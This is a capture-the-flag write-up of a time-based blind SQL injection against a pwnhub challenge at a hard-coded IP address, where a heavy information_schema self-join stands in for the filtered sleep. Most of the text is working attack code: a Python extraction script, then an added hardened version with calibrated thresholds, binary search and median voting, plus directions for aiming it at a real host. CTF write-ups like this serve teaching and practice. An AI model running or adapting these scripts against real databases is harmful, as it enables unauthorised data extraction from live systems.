pwnhub | 目瞪狗呆

Aryb1n, April 3, 2018

No output is echoed back, so it looks like the only option is a time-based blind injection.

There was a challenge in hgame that filtered `if` and, as far as I remember, was solved the same way, but back then functions like sleep were not filtered.

select 1 from user where id = 1 and 1=1 and sleep(5);
delays
select 1 from user where id = 1 and 1=0 and sleep(5);
does not delay

Here the usual time-based blind functions are filtered, so a slow operation can be found to take the place of sleep. But there are constant problems... some of the characters come out wrong...
Tuning the delay... really QAQ, suffocating. I don't know whether it is because other people are running it at the same time... it seems I can only get part of the flag right, for example p0n0u0{, pwnh0b{

import string
import requests

# sleep/benchmark are filtered, so the delay comes from a three-way self-join of
# information_schema.columns. MySQL short-circuits AND: the heavy COUNT(*) only
# runs when the preceding condition is true, so a correct guess times out and a
# wrong one returns quickly.
TIMEOUT = 10


def attack(url):
    """Return True when the request times out, i.e. the injected condition held."""
    try:
        requests.get(url, timeout=TIMEOUT)
        return False
    except requests.exceptions.Timeout:
        return True
    except requests.exceptions.RequestException as e:
        # A connection error is not evidence of a match; report it and move on.
        print("request failed:", e)
        return False


url = ("http://52.80.179.198:8080/article.php?id=1' and {} and 100 > "
       "(select count(*) from information_schema.columns A, "
       "information_schema.columns B, information_schema.columns C)-- ")

# Sanity check of the oracle: '(1=1)' should time out, '(1=0)' should return at once.
payload = '(ord(substr(({}), {}, 1))={})'
payload = payload.format('select flag from flags', '{}', '{}')

att_url = url.format(payload)
print(att_url)

flag = ""
for i in range(1, 30):
    for ch in string.printable:
        pay = att_url.format(i, ord(ch))
        if attack(pay):
            flag += ch
            print(flag)
            print(pay)
            break
    else:
        # No printable character matched this position (end of flag, or a
        # noisy timing); keep the positions aligned instead of silently skipping.
        flag += "?"
        print(flag)
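The write-up notes that some characters came out wrong, most likely because other players were loading the same box at the time. The following is an added example (not the write-up's script, and not tied to the real challenge) of how to make a time-based oracle tolerate that noise: calibrate the true/false threshold from known conditions, binary-search each character's code with `>` comparisons instead of ~100 equality probes, and take the median of several timings per comparison. `FLAG_QUERY`, `HEAVY_JOIN` and the condition shape are taken from the script above; `SimulatedOracle` is a constructed stand-in for the target (the flag, the timings and the stall pattern are made up) so the code runs offline. To use it against a real host, replace its two `time_*` methods with timed `requests.get` calls that append `injected_tail(...)` to the vulnerable parameter.

```python
"""Time-based blind extraction hardened against noisy timings: calibrated
threshold, binary search over ord() and median-of-N voting.  Added example,
not the write-up's script.  SimulatedOracle is a constructed fake target."""
import random
import statistics

FLAG_QUERY = "select flag from flags"   # subquery used by the write-up's script
HEAVY_JOIN = ("100 > (select count(*) from information_schema.columns A, "
              "information_schema.columns B, information_schema.columns C)")


def condition(position, value, op):
    """Injected boolean: ord() of one flag character compared with `value`."""
    return "(ord(substr(({}), {}, 1)){}{})".format(FLAG_QUERY, position, op, value)


def injected_tail(cond):
    """AND short-circuits in MySQL, so the heavy join (the sleep substitute)
    only runs, and the response only stalls, when `cond` is true."""
    return "1' and {} and {}-- ".format(cond, HEAVY_JOIN)


class SimulatedOracle:
    """Constructed fake target: returns a response time instead of doing HTTP.
    Every 5th request stalls as if the shared box were under load; that is the
    kind of noise that turns single-shot checks into wrong flag characters."""

    def __init__(self, secret, slow=12.0, fast=0.4, jitter=1.5, stall_every=5):
        self.secret, self.slow, self.fast = secret, slow, fast
        self.jitter, self.stall_every = jitter, stall_every
        self.rng = random.Random(1)      # seeded so runs are reproducible
        self.requests = 0

    def _respond(self, truth):
        self.requests += 1
        t = (self.slow if truth else self.fast) + self.rng.uniform(0, self.jitter)
        if self.requests % self.stall_every == 0:
            t += self.slow               # unrelated stall: a false looks like a true
        return t

    def time_known(self, truth):
        """Calibration probe, the equivalent of sending '(1=1)' or '(1=0)'."""
        return self._respond(truth)

    def time_condition(self, position, value, op):
        # MySQL: substr() past the end gives '' and ord('') is 0, hence the 0.
        code = ord(self.secret[position - 1]) if position <= len(self.secret) else 0
        return self._respond(code == value if op == "=" else code > value)


def calibrate(oracle, samples=3):
    """Threshold halfway between the median 'true' and median 'false' timing."""
    t = statistics.median([oracle.time_known(True) for _ in range(samples)])
    f = statistics.median([oracle.time_known(False) for _ in range(samples)])
    return (t + f) / 2


def is_true(oracle, threshold, position, value, op, votes):
    """Median of `votes` timings above the threshold means the condition held."""
    times = [oracle.time_condition(position, value, op) for _ in range(votes)]
    return statistics.median(times) > threshold


def extract(oracle, votes=3, max_len=64):
    """Binary-search each character's code (7 comparisons instead of ~100
    equality probes); stop when ord() reads 0, i.e. past the end of the flag."""
    threshold = calibrate(oracle)
    flag = ""
    for position in range(1, max_len + 1):
        lo, hi = 0, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(oracle, threshold, position, mid, ">", votes):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        flag += chr(lo)
    return flag


if __name__ == "__main__":
    secret = "pwnhub{t1m3_bl1nd}"       # constructed, not the real flag
    print(extract(SimulatedOracle(secret), votes=1))   # single-shot: corrupted by stalls
    print(extract(SimulatedOracle(secret), votes=3))   # voted: recovers the secret
```

Three votes per comparison only cost about 21 requests per character, still far fewer than the 100 single-shot equality probes per character in the script above, and a stall that hits one of the three timings no longer flips the answer.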